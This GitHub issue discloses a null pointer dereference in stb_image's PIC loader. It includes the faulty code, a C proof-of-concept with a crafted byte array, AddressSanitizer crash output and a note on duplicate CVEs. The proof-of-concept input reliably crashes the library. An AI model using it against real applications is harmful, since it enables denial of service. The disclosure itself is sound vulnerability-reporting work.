Open JarLob opened 8 months ago
A crafted image file can trigger null pointer access in stbi__convert_format where src is null. It happens when stbi__pic_load_core in stbi__pic_load fails, the result is set to zero [1], but the flow continues [2].
stbi__convert_format
src
stbi__pic_load_core
stbi__pic_load
result
if (!stbi__pic_load_core(s,x,y,comp, result)) { STBI_FREE(result); result=0; // [1] } *px = x; *py = y; if (req_comp == 0) req_comp = *comp; result=stbi__convert_format(result,4,req_comp,x,y); // [2]
This issue may lead to denial of service.
To reproduce the issue:
#include <stdint.h> #define STB_IMAGE_IMPLEMENTATION #include "../stb_image.h" int main(int argc, char* argv[]) { const uint8_t data[] = {0x53,0x80,0xf6,0x34,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x40,0x00,0x08,0x01,0x20,0xff,0x10,0x40, 0x74,0x72,0x74,0x65,0x69,0xab,0x4c,0x65,0x31,0x6e, 0x20,0x62,0x79,0x20,0x6d,0x65,0x6e,0x74,0x61,0x6c, 0x20,0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50, 0x49,0x43,0x54,0x00,0x50,0x49,0x43,0x57,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00, 0x08,0x01,0x20,0xff,0x10,0x6e,0x74,0x61,0x6c,0x20, 0x69,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x50,0x49, 0x43,0x54,0x00,0x50,0x54,0x20,0x10}; size_t size = sizeof(data); int x, y, z, channels; stbi_uc *img = stbi_load_from_memory(data, size, &x, &y, &channels, 2); stbi_image_free(img); return 0; }
==183891==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004f944d bp 0x7ffefb18fe50 sp 0x7ffefb18fa00 T0) ==183891==The signal is caused by a READ memory access. ==183891==Hint: address points to the zero page. #0 0x4f944d in stbi__convert_format(unsigned char*, int, int, unsigned int, unsigned int) tests/../stb_image.h:1786:52 #1 0x4ecdbe in stbi__pic_load(stbi__context*, int*, int*, int*, int, stbi__result_info*) tests/../stb_image.h:6535:11 #2 0x4e463b in stbi__load_main(stbi__context*, int*, int*, int*, int, stbi__result_info*, int) tests/../stb_image.h:1159:35 #3 0x4dc48f in stbi__load_and_postprocess_8bit(stbi__context*, int*, int*, int*, int) tests/../stb_image.h:1261:19 #4 0x4de334 in stbi_load_from_memory tests/../stb_image.h:1431:11
Looks like it collided with https://github.com/nothings/stb/issues/1521 which has CVE-2023-43898 assigned to it. I'll request to withdraw the CVE-2023-45665.
A crafted image file can trigger null pointer access in
stbi__convert_format
wheresrc
is null. It happens whenstbi__pic_load_core
instbi__pic_load
fails, theresult
is set to zero [1], but the flow continues [2].Impact
This issue may lead to denial of service.
Resources
To reproduce the issue: